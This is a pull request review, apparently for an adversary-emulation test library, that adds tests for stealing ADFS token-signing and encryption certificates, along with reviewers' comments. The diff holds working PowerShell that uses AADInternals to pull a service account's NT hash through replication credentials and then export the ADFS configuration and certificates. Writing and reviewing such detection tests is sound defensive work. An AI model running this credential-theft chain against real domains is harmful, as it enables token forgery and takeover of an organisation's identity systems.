### PR TITLE
Adfs key theft

### PR DESCRIPTION
**Pull request by piaconsigny**
**Details:**
Add ADFS certificates theft to T1552.004 (https://attack.mitre.org/techniques/T1552/004/)

**Testing:**
Works in test env

**Associated Issues:**
None

### CODE REVIEW

File: atomics/T1552.004/T1552.004.yaml [hunk 1]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+      description: Name of the DC server
+      type: String
+      default: "DC01.contoso.com"
+    adfs_server_name:
+      description: Name of the ADFS server
+      type: String
+      default: "sts.contoso.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:138]: What about the "ActiveDirectory" module?

File: atomics/T1552.004/T1552.004.yaml [hunk 2]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force
+      Import-Module AADInternals -Force
+
+      #Get Configuration
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq #{adfs_service_account_name}
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:150]:
```suggestion
      $svc = Get-ADUser -identity "#{adfs_service_account_name}" -Properties objectguid,objectsid
```
I didn't test it so please do, but it looks more efficient!

File: atomics/T1552.004/T1552.004.yaml [hunk 3]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+      Export-AADIntADFSCertificates -verbose
+      Write-Host "Certificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+- name: ADFS signing token certificate theft - Remote
+  auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+  description: |
+    Retrieve ADFS signing token and encrypting token certificates. You must be signed in as Domain Administrator on a domain join computer.
```
[the remark this answers is not in the document]
Comment (cnotin) [reply atomics/T1552.004/T1552.004.yaml:112]: Need Domain Admins too as we discussed

File: atomics/T1552.004/T1552.004.yaml [hunk 4]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force
+      Import-Module AADInternals -Force
+
+      #Get Configuration
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq #{adfs_service_account_name}
+      $PWord = ConvertTo-SecureString -String #{replication_password} -AsPlainText -Force
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:151]:
```suggestion
      $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
```

File: atomics/T1552.004/T1552.004.yaml [hunk 5]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+      $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server #{dc_server_name} -AsHex
+      $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+
+      #Get Key
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:156]:
```suggestion
      #Get encrypted certificates from configuration
```

File: atomics/T1552.004/T1552.004.yaml [hunk 6]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+    command: |
+      Import-Module ActiveDirectory -Force
+      Import-Module AADInternals -Force
+
+      #Get Configuration
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq #{adfs_service_account_name}
+      $PWord = ConvertTo-SecureString -String #{replication_password} -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+      $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server #{dc_server_name} -AsHex
+      $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:154]: Is "-Server" really mandatory?

File: atomics/T1552.004/T1552.004.yaml [hunk 7]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+      type: String
+      default: "Administrator"
+    replication_password:
+      description: Password of replication_username
+      type: String
+      default: "ReallyStrongPassword"
+    dc_server_name:
+      description: Name of the DC server
+      type: String
+      default: "DC01.contoso.com"
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:131]: Given we import the "ActiveDirectory" module and that the script runs as a domain user, we should be able to discover a DC automatically without having to pass it as argument

**Review by cnotin — CHANGES_REQUESTED** [review]
Good job! Just a couple of improvement suggestions :)

File: atomics/T1552.004/T1552.004.yaml (hunk 6 above)
Comment (piaconsigny) [reply atomics/T1552.004/T1552.004.yaml:154]: Yes as adfs can be on another server than dc

Comment (cnotin) [reply atomics/T1552.004/T1552.004.yaml:154]: Oops sorry I meant for the line above "Get-AADIntADUserNTHash" but it seems that it'll be required, as explicit credentials are too... :)

File: atomics/T1552.004/T1552.004.yaml (hunk 5 above)
Comment (piaconsigny) [reply atomics/T1552.004/T1552.004.yaml:156]: That's not what is done here. Certificates are retrieve in Export-AADIntADFSCertificates. The following line are meant to find the path to the key in the AD.

File: atomics/T1552.004/T1552.004.yaml (hunk 2 above)
Comment (piaconsigny) [reply atomics/T1552.004/T1552.004.yaml:150]: The adfs account can be a user with "password never expire" policy or a managed service account. The latter won't be recognise with Get-ADUser.

File: atomics/T1552.004/T1552.004.yaml [hunk 8]
```diff
@@ -83,4 +83,100 @@ atomic_tests:
...
+    prereq_command: |
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force
+      Import-Module AADInternals -Force
+
+      #Get Configuration
```
Comment (cnotin) [inline atomics/T1552.004/T1552.004.yaml:149]:
```suggestion
      #Get encrypted certificates from configuration
```

File: atomics/T1552.004/T1552.004.yaml (hunk 5 above)
Comment (cnotin) [reply atomics/T1552.004/T1552.004.yaml:156]: Indeed my bad! I moved this suggestion at the beginning, and thus instead:
```suggestion
      # Get certificates decryption key
```
No need to apply this comment just below as I initially suggested

File: atomics/T1552.004/T1552.004.yaml (hunk 2 above)
Comment (cnotin) [reply atomics/T1552.004/T1552.004.yaml:150]: Good catch indeed!

**Review by cnotin — APPROVED** [review]
Awesome 🎉

**Pull request merged**